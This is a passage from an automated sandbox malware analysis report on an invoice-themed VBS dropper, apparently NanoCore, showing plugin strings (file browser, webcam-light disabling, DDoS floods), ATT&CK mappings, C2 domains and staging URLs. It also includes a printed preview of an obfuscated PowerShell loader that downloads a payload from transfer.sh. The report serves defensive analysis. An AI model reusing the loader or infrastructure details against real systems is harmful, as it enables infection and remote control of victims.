ortConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: aspnet_compiler.exe, 0000000A.00000003.619763288.0000000004466000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: aspnet_compiler.exe, 0000000A.00000003.619763288.0000000004466000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: aspnet_compiler.exe, 0000000A.00000003.619763288.0000000004466000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Registry Run Keys / Startup Folder1	Process Injection211	Masquerading1	OS Credential Dumping	Query Registry1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter11	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder1	Disable or Modify Tools1	LSASS Memory	Security Software Discovery11	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scripting221	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion21	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	PowerShell1	Logon Script (Mac)	Logon Script (Mac)	Process Injection211	NTDS	Virtualization/Sandbox Evasion21	Distributed Component Object Model	Input Capture	Scheduled Transfer	Ingress Tool Transfer1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Scripting221	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Hidden Files and Directories1	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol13	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information1	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery12	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
newjan.duckdns.org	10%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
newjan.duckdns.org	194.147.140.20	true	true	10%, Virustotal, Browse	unknown
transfer.sh	144.76.136.153	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://transfer.sh/DJr8t4/edrf.txt	false		high
https://transfer.sh/fzfQo2/sewwed.txt	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://transfer.sh	powershell.exe, 00000001.00000002.418451254.00000146802BB000.00000004.00000001.sdmp	false		high
https://transfer.sh/fzfQo2/sewwed.txt(	powershell.exe, 00000001.00000002.419051685.0000014680442000.00000004.00000001.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.418451254.00000146802BB000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://google.com	aspnet_compiler.exe, 0000000A.00000003.619763288.0000000004466000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000001.00000002.419051685.0000014680442000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.418005848.0000014680001000.00000004.00000001.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.418451254.00000146802BB000.00000004.00000001.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.418451254.00000146802BB000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000001.00000002.419051685.0000014680442000.00000004.00000001.sdmp	false		high
https://transfer.sh/DJr8t4/edrf.txt(	powershell.exe, 00000001.00000002.418295936.000001468020C000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
144.76.136.153	transfer.sh	Germany		24940	HETZNER-ASDE	false
194.147.140.20	newjan.duckdns.org	unknown		47285	PTPEU	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	483356
Start date:	14.09.2021
Start time:	21:22:37
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	9 ITEMS INVOICE RECEIPT.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winVBS@6/10@27/2
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .vbs Override analysis time to 240s for JS/VBS files not yet terminated
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 23.35.236.56, 173.222.108.210, 173.222.108.147 Excluded domains from analysis (whitelisted): fs.microsoft.com, wu-shim.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, download.windowsupdate.com.edgesuite.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtQueryVolumeInformationFile calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:23:44	API Interceptor	46x Sleep call for process: powershell.exe modified
21:25:01	API Interceptor	1393x Sleep call for process: aspnet_compiler.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
144.76.136.153	Receipt_12203.vbs	Get hash	malicious	Browse	transfer.sh/get/E2oQCW/Server.txt
	Invoice #60122.vbs	Get hash	malicious	Browse	transfer.sh/get/Vp6k0P/Server.txt
	M00GS82.vbs	Get hash	malicious	Browse	transfer.sh/get/QipjYs/fOOFFK.txt
	#P0082.vbs	Get hash	malicious	Browse	transfer.sh/get/4YgL52/HJN.txt
	Invoice #33190.vbs	Get hash	malicious	Browse	transfer.sh/get/1jDQCmj/trivago.txt
	ZHDJFEB83MK.vbs	Get hash	malicious	Browse	transfer.sh/15cCRXY/KFKFKF.txt
	#W002.vbs	Get hash	malicious	Browse	transfer.sh/1YKpmfw/HmS.txt
	WOO62_InvoiceCopy.vbs	Get hash	malicious	Browse	transfer.sh/p/SHJA.txt
	A719830-Paid-Receipt.vbs	Get hash	malicious	Browse	transfer.sh/b/deef.txt
	S0187365-Paid-Receipt.vbs	Get hash	malicious	Browse	transfer.sh/1w231Gc/eeff.txt
	X92867354_PAYMENT_RECEIPT.vbs	Get hash	malicious	Browse	transfer.sh/1cKLmWw/defff.txt
	H6289_Payment_Invoice_.vbs	Get hash	malicious	Browse	transfer.sh/bypass.txt
	W00903InvoicePayment.vbs	Get hash	malicious	Browse	transfer.sh/1Qh4UR2/defender.txt
	R73981_Payment_Invoice_.vbs	Get hash	malicious	Browse	transfer.sh/1yD4k6Q/ftf.txt
	S83735478_Payment_Invoice.vbs	Get hash	malicious	Browse	transfer.sh/1WFWzN7/defender.txt
	D37186235_Payment_Invoice.vbs	Get hash	malicious	Browse	transfer.sh/1RzUlWk/defender.txt
	In_WO072.vbs	Get hash	malicious	Browse	transfer.sh/1RKyZ9I/hjdds.txt
	FDOCX3429067800.vbs	Get hash	malicious	Browse	transfer.sh/1AeAeyx/defender.txt
	W092.vbs	Get hash	malicious	Browse	transfer.sh/1DiufNP/JKS.txt
	Texas Windstorm Insurance upgrade package.vbs	Get hash	malicious	Browse	transfer.sh/get/1R86ggs/defender.txt

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
newjan.duckdns.org	15 Items Receipt.vbs	Get hash	malicious	Browse	194.147.140.20
	14 Items receipt.vbs	Get hash	malicious	Browse	194.147.140.20
	16 Items receipt.vbs	Get hash	malicious	Browse	194.147.140.20
	41-Items-invoice.vbs	Get hash	malicious	Browse	194.147.140.20
	8 Items invoice.vbs	Get hash	malicious	Browse	194.147.140.20
	3G1J49A6V_Invoice.vbs	Get hash	malicious	Browse	185.244.30.23
	LxYbtlP5nB.exe	Get hash	malicious	Browse	185.244.30.23
	Invoice#282730.exe	Get hash	malicious	Browse	79.134.225.9
	Urban Receipt.exe	Get hash	malicious	Browse	79.134.225.9
	d9hGzIR8mh.exe	Get hash	malicious	Browse	194.5.97.75
	6554353_Payment_Invoice.exe	Get hash	malicious	Browse	194.5.97.75
transfer.sh	15 Items Receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	14 Items receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	16 Items receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	41-Items-invoice.vbs	Get hash	malicious	Browse	144.76.136.153
	12-items-receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	8 Items invoice.vbs	Get hash	malicious	Browse	144.76.136.153
	Receipt_12203.vbs	Get hash	malicious	Browse	144.76.136.153
	Payment_Advoce.vbs	Get hash	malicious	Browse	144.76.136.153
	Payment_Advoce.vbs	Get hash	malicious	Browse	144.76.136.153
	Invoice #60122.vbs	Get hash	malicious	Browse	144.76.136.153
	83736354Invoicereceipt.vbs	Get hash	malicious	Browse	144.76.136.153
	Invoice52190.vbs	Get hash	malicious	Browse	144.76.136.153
	M00GS82.vbs	Get hash	malicious	Browse	144.76.136.153
	Invoice#52190.vbs	Get hash	malicious	Browse	144.76.136.153
	Payment_Advoce.vbs	Get hash	malicious	Browse	144.76.136.153
	8373543_Invoice_Receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	A6D8N25S_Invoice_receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	Invoice#1096.vbs	Get hash	malicious	Browse	144.76.136.153
	Receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	#P0082.vbs	Get hash	malicious	Browse	144.76.136.153

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HETZNER-ASDE	AQjULTL4bf.exe	Get hash	malicious	Browse	144.76.112.41
	zehRYOQKumNzslOoJFhSzJMOABzMtmqTelWJsoDCsqmu.vbs	Get hash	malicious	Browse	88.99.219.185
	15 Items Receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	gyuFYFGuig.vbs	Get hash	malicious	Browse	148.251.87.253
	14 Items receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	16 Items receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	diagram-129.doc	Get hash	malicious	Browse	136.243.74.161
	diagram-129.doc	Get hash	malicious	Browse	136.243.74.161
	i3UmAT06iE.exe	Get hash	malicious	Browse	195.201.225.248
	cd.exe	Get hash	malicious	Browse	168.119.139.96
	diagram-129.doc	Get hash	malicious	Browse	136.243.74.161
	GCw589FSm7.exe	Get hash	malicious	Browse	195.201.225.248
	jFQ6SEAt26	Get hash	malicious	Browse	49.13.162.183
	67d16a17f27f15cf21671ccb406e1e8b647aaf90c72c9.exe	Get hash	malicious	Browse	195.201.225.248
	diagram-477.doc	Get hash	malicious	Browse	136.243.74.161
	diagram-477.doc	Get hash	malicious	Browse	136.243.74.161
	diagram-477.doc	Get hash	malicious	Browse	136.243.74.161
	4J1sKiGm0T.exe	Get hash	malicious	Browse	116.203.165.54
	lB2RFTpyni.exe	Get hash	malicious	Browse	116.203.165.54
	lgT2LzjZ6N.exe	Get hash	malicious	Browse	116.203.165.54

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	15 Items Receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	14 Items receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	16 Items receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	diagram-129.doc	Get hash	malicious	Browse	144.76.136.153
	8aGRdeN1Be.exe	Get hash	malicious	Browse	144.76.136.153
	QLMRTJS9RA.exe	Get hash	malicious	Browse	144.76.136.153
	SecuriteInfo.com.W32.AIDetect.malware2.32348.exe	Get hash	malicious	Browse	144.76.136.153
	diagram-477.doc	Get hash	malicious	Browse	144.76.136.153
	Rombat-0118PDF.exe	Get hash	malicious	Browse	144.76.136.153
	CLLKFIJI_(9-13-2021).xlsx.vbs	Get hash	malicious	Browse	144.76.136.153
	YyKMqtQcLMkGx.vbs	Get hash	malicious	Browse	144.76.136.153
	Halkbank_Ekstre_20210913_074002_566345 pdf.exe	Get hash	malicious	Browse	144.76.136.153
	Kopie dokladu o transakci 09_14_21.exe	Get hash	malicious	Browse	144.76.136.153
	qashmhBw9u.exe	Get hash	malicious	Browse	144.76.136.153
	setup_x86_x64_install.exe	Get hash	malicious	Browse	144.76.136.153
	Quotation.exe	Get hash	malicious	Browse	144.76.136.153
	PROJ-9560 - PACKING SLIP.exe	Get hash	malicious	Browse	144.76.136.153
	41-Items-invoice.vbs	Get hash	malicious	Browse	144.76.136.153
	12-items-receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	Halkbank_Ekstre_20210726_084931-069855PDF.exe	Get hash	malicious	Browse	144.76.136.153

Dropped Files

No context

Created / dropped Files

C:\Users\Public\Run\New.vbs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	3099
Entropy (8bit):	3.6647291390920165
Encrypted:	false
SSDEEP:	96:O4yyyyyyyyyyyyyyRyyyyyyyyyyyyyyjXWipjOyyyyyyyyyyy0lnmyyyyyyyyyyD:O4yyyyyyyyyyyyyyRyyyyyyyyyyyyyyB
MD5:	0A9011A7F371477C757D0686863065AF
SHA1:	665921B6CF414211C8A81C5B3CEF2DF5BC89E66B
SHA-256:	FB94B4C0E97BD41284E0F1818F58D038B858DC6199DE097FB60FDED4B8BD29AD
SHA-512:	DAF4CBC3EE4A532BD6FF2F1EBEA32D83D94F100933C421F838D294C1B17BD0B0872D381F13C3C7FA94BBD90C1B0B5DCF013FF400D5A1A521C4A613B914FD6849
Malicious:	false
Yara Hits:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: C:\Users\Public\Run\New.vbs, Author: Florian Roth
Reputation:	low
Preview:	Set H = CreateObject("WScript.She"&"ll")..H1 = "POwerSheLL "..H2 = "$SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/fzfQo2/sewwedH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	57895
Entropy (8bit):	5.07724879463521
Encrypted:	false
SSDEEP:	1536:vvI+z30kaAxV3CNBQkj25h4iUxvaV7flJnVv6H15qdpnUSlQOdBQNUzktAHkbNK3:nI+z30NAxV3CNBQkj25qiUvaV7flJnV/
MD5:	ABF0CA1055207E755309961A7F660E0D
SHA1:	F886C56CCD77C17EBE81C8BFBFFCC42CBC614458
SHA-256:	F2161823E2B5F73BBD5C674EA1E610A412370E87E23377B9DB1E6451F5417139
SHA-512:	3535DB5640324B1E39616B23F30BE723F16446E5747A5FEC69F8090C0EDEE489E129BA9C6CC1EB5E290620570DFABC73F1CF116042B006BD692F7671A078D4CC
Malicious:	false
Reputation:	moderate, very likely benign file
